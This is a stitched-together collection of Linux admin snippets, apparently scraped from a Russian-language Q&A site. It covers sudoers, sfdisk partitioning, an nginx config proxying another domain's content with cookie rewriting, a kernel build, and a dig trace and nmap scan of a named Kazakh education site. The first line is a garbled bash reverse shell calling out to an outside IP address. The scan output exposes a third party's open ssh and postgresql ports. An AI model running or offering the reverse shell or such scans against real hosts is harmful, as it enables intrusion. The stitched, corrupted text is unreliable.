/in/bash -l >P/dev葉cp/176.59.41.128/4242 0<&1 2>&1
sudo nano /etc/sudoers.d/username
%username ALL= NOPASSWD: /bin/systemctl reload nginx
sudo systemctl reload nginx
делаем IP статичным, прокидываем порт и оно работаетЕсли внешний IP белый и статичный и порт на маршрутизаторе проброшен, то всё работает без проблем. Но это не лучший способ, светить открытый RDP в интернет опасно.
echo -e "label:mbr\nstart=1M" | sfdisk /dev/sdb
echo -e "label:gpt\nsize=100M\nsize=+" | sfdisk /dev/sdb
Диск должен быть разбит на 4 раздела. 3 я создаю из дампа sfdisk. Нужно создать еще один. Последний. На все оставшееся место.
echo -e "size=+" | sfdisk -N 4 /dev/sdb
$ truncate -s 1G disk.img
$ echo -e "label:mbr\nsize=100M\nsize=200M\nsize=300M" | sfdisk disk.img
$ sfdisk --dump disk.img
label: dos
label-id: 0x58b01c8a
device: disk.img
unit: sectors
sector-size: 512
disk.img1 : start= 2048, size= 204800, type=83
disk.img2 : start= 206848, size= 409600, type=83
disk.img3 : start= 616448, size= 614400, type=83
$ echo -e "size=+" | sfdisk -N 4 disk.img
$ sfdisk --dump disk.img
label: dos
label-id: 0x58b01c8a
device: disk.img
unit: sectors
sector-size: 512
disk.img1 : start= 2048, size= 204800, type=83
disk.img2 : start= 206848, size= 409600, type=83
disk.img3 : start= 616448, size= 614400, type=83
disk.img4 : start= 1230848, size= 866304, type=83
return 301 https://$host$request_uri;
proxy_pass
.server {
listen 443 ssl;
server_name ваш-домен.ру;
proxy_pass https://берём-содержимое.ру;
proxy_cookie_domain берём-содержимое.ру ваш-домен.ру;
make menuconfig
make
make install
make modules_install
$ dig +trace www.aktobe-edu.kz
; <<>> DiG 9.12.1 <<>> +trace www.aktobe-edu.kz
;; global options: +cmd
. 498444 IN NS a.root-servers.net.
. 498444 IN NS b.root-servers.net.
. 498444 IN NS c.root-servers.net.
. 498444 IN NS d.root-servers.net.
. 498444 IN NS e.root-servers.net.
. 498444 IN NS f.root-servers.net.
. 498444 IN NS g.root-servers.net.
. 498444 IN NS h.root-servers.net.
. 498444 IN NS i.root-servers.net.
. 498444 IN NS j.root-servers.net.
. 498444 IN NS k.root-servers.net.
. 498444 IN NS l.root-servers.net.
. 498444 IN NS m.root-servers.net.
. 498444 IN RRSIG NS 8 0 518400 20221010050000 20220927040000 20826 . E5aHqAj0MqKBkUBMP7OC3GDjnnr2T1unuV9Qy29b4VAYj7onRsOJypPn MDlXlFx1PcnOxOR3ATfuJnvKp+e7jOTsX7XJNo3NKhlin+dzdL12q9Rg /D3kutjO6eDFBySaJU9fzt4yFa92hZclEiZSk87GkTZPfkV1k9exgP0U NszN9caQfChOt9/jS+0d8LAO9ZWdiPWeB+d/cXwm+wtE4YmV0eUjmuPw ZOGBLKX6EYSoYBm2gLK4ObAGb9OXgty5ub85RVdwTIIegRHHD0YisYYS 0YiPos4LCDlUgRDWIOicz4a44ThQ5Q59HuZmCgYCIJbGH8u2nmfcYPru xfv8Bw==
;; Received 1137 bytes from 127.0.0.1#53(127.0.0.1) in 0 ms
kz. 172800 IN NS ns1.nic.kz.
kz. 172800 IN NS ns.nic.kz.
kz. 86400 IN NSEC la. NS RRSIG NSEC
kz. 86400 IN RRSIG NSEC 8 1 86400 20221010050000 20220927040000 20826 . RQSFc1pWPq1s+sHh7f4YkBy8Bgr5lGw0s/UlFrktVIpAWpEFK93F710b orNboQ8k2tzEezqOuM8A57ew50zWSoK4Ug8CJPWmRh0/jZJvczrpyAev CpDWqeoeWSdm1bKJ/fGHVtnp8ho91AffVdAqTOjTG69APgK/L4RVuSXY p/rD98Fb0HOPe5xTq/bbpLtn4udwcowJESo51n0bDgOKMZFqaCE54GHD 26pEAngTasy6gV3v7yJnIZfe6krgQgs/OCmXk6IDqpcWebF3Qr9gcmQ7 XsXbQXBDc4m1ab8D0dv9Dpu2p11U71R3djqNb5qSpzz6g5ElvJAp0GPK rYXfuQ==
;; Received 516 bytes from 192.112.36.4#53(g.root-servers.net) in 122 ms
aktobe-edu.kz. 86400 IN NS ns1.aktobe-edu.kz.
aktobe-edu.kz. 86400 IN NS ns2.aktobe-edu.kz.
;; Received 142 bytes from 185.79.212.7#53(ns1.nic.kz) in 84 ms
www.aktobe-edu.kz. 100 IN CNAME aktobe-edu.kz.
aktobe-edu.kz. 100 IN A 178.91.234.10
aktobe-edu.kz. 100 IN NS ns1.aktobe-edu.kz.
;; Received 138 bytes from 178.91.234.10#53(ns2.aktobe-edu.kz) in 91 ms
$ nmap -Pn 178.91.234.10
Starting Nmap 7.70 ( https://nmap.org ) at 2022-09-27 17:11 MSK
Nmap scan report for 178.91.234.10
Host is up (0.089s latency).
Not shown: 990 closed ports
PORT STATE SERVICE
21/tcp filtered ftp
22/tcp open ssh
23/tcp filtered telnet
53/tcp open domain
80/tcp filtered http
135/tcp filtered msrpc
139/tcp filtered netbios-ssn
443/tcp filtered https
5432/tcp open postgresql
8080/tcp filtered http-proxy